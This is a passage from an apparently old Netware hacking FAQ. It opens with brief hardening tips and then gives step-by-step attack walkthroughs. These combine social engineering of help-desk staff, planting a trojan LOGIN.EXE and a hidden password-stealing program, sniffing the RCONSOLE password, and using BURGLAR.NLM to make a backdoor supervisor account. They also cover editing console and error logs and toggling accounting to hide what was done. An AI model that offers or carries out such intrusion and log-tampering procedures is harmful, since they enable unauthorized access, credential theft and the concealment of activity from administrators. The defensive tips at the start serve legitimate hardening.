  1526. AUTOEXEC.NCF file in the SYS:SYSTEM with a false RCONSOLE password (among
  1527. other things). 
  1528.  
  1529. Use the Lock File Server Console option in Monitor (3.x and above) -
  1530. --------------------------------------------------------------------
  1531.  
  1532. Even if the RCONSOLE password is discovered, the Supe password is discovered,
  1533. or physical access is gained, a hard to guess password on the console will
  1534. stop someone from accessing the console.
  1535.  
  1536. Add EXIT to the end of the System Login Script -
  1537. ------------------------------------------------
  1538.  
  1539. By adding the EXIT command as the last line in the System Login Script,
  1540. you can control to a degree what the user is doing. This eliminates the
  1541. potential for personal Login Script attacks, as described in section 03-6.
  1542.  
  1543. Upgrade to Netware 4.1 -
  1544. ------------------------
  1545.  
  1546. Besides making a ton of Novell sales and marketing people very happy, you
  1547. will defeat most of the techniques described in this faq. Most well-known
  1548. hacks are for 3.11. If you don't want to make the leap to NDS and 4.1, at
  1549. least get current and go to 3.12.
  1550.  
  1551. ---------------------------------------------------------------------------
  1552.  
  1553. 07-2. I'm an idiot. Exactly how do hackers get in?
  1554.  
  1555. We will use this section as an illustrated example of how these techniques can
  1556. be used in concert to gain Supe access on the target server. These techniques
  1557. show the other thing that really helps in Netware hacking - a little social 
  1558. engineering.
  1559.  
  1560. Exploitation #1
  1561. ---------------
  1562.  
  1563. Assume tech support people are dialing in for after hours support. Call up and 
  1564. pose as a vendor of security products and ask for tech support person. Called 
  1565. this person posing as a local company looking for references, ask about remote 
  1566. dial-in products. Call operator of company and ask for help desk number. Call
  1567. help desk after hours and ask for dial-in number, posing as the tech support 
  1568. person. Explain home machine has crashed and you've lost number.
  1569.  
  1570. Dial in using the proper remote software and try simple logins and passwords for
  1571. dial-in software if required. If you can't get in call help desk especially if
  1572. others such as end users use dial-in.
  1573.  
  1574. Upload alternate LOGIN.EXE and PROP.EXE, and edit AUTOEXEC.BAT to run the 
  1575. alternate LOGIN.EXE locally. Rename PROP.EXE to IBMNBIO.COM and make it hidden. 
  1576. Before editing AUTOEXEC.BAT change the date and time of the PC so that the date/time stamp reflects the original before the edit.
  1577.  
  1578. Dial back in later, rename PROP.EXE and run it to get Accounts and passwords.
  1579.  
  1580. Summary - Any keystroke capture program could produce the same results as the 
  1581. alternate LOGIN.EXE and PROP.EXE, but you end up with a Supe equivalent account.
  1582.  
  1583. Exploitation #2
  1584. ---------------
  1585.  
  1586. Load a DOS-based packet sniffer, call the sys admin and report a FATAL
  1587. DIRECTORY ERROR when trying to access the server. He predictively will use 
  1588. RCONSOLE to look at the server and his packet conversation can be captured. He 
  1589. will find nothing wrong (of course).
  1590.  
  1591. Study the capture and use the RCON.FAQ to obtain the RCONSOLE password. Log in 
  1592. as GUEST, create a SYSTEM subdirectory in the home directory (or any directory 
  1593. on SYS:). Root map a drive to the new SYSTEM, copy RCONSOLE.* to it, and run
  1594. RCONSOLE. Once in try to unload CONLOG and upload BURGLAR.NLM to the real 
  1595. SYS:SYSTEM. Created a Supe user (i.e. NEWUSER) and then typed CLS to clear the 
  1596. server console screen. 
  1597.  
  1598. Log in as NEWUSER. Erase BURGLAR.NLM, new SYSTEM directory and its contents.
  1599. Run PURGE in those directories. Turn off Accounting if on. Give GUEST Supe 
  1600. rights. Set toggle with SUPER.EXE for NEWUSER. Run FILER and note SYS:ETC\CONSOLE.LOG (if CONLOG was loaded) owner and create date, as well as
  1601. SYS:SYSTEM\SYS$ERR.LOG owner and create date. Edit SYS:ETC\CONSOLE.LOG and 
  1602. remove BURGLAR.NLM activity, including RCONSOLE activity. Edit and remove
  1603. RCONSOLE activity from SYS:SYSTEM\SYS$ERR.LOG as well. After saving files,
  1604. run FILER and restore owner and dates if needed. Run PURGE in their directories.
  1605. Logout and login as GUEST and set SUPER.EXE toggle. Remove NEWUSER Supe rights
  1606. and logout. Login as NEWUSER with SUPER.EXE and remove GUEST Supe rights.
  1607. Finally logout and login as GUEST with SUPER.EXE and turn on Accounting if it
  1608. was on. 
  1609.  
  1610. Summary - You have created a backdoor into the system that will not show up as
  1611. somthing unusual in the Accounting log. Login as GUEST using SUPER.EXE and turn 
  1612. off Accounting. Logout and back in as NEWUSER with SUPER.EXE, do what you
  1613. need to do (covering file alterations with Filer), and logout. Log back in as 
  1614. GUEST and turn on Accounting. The NET$ACCT.DAT file shows only GUEST logging in 
  1615. followed by GUEST logging out. 
  1616.  
  1617. ---------------------------------------------------------------------------
  1618.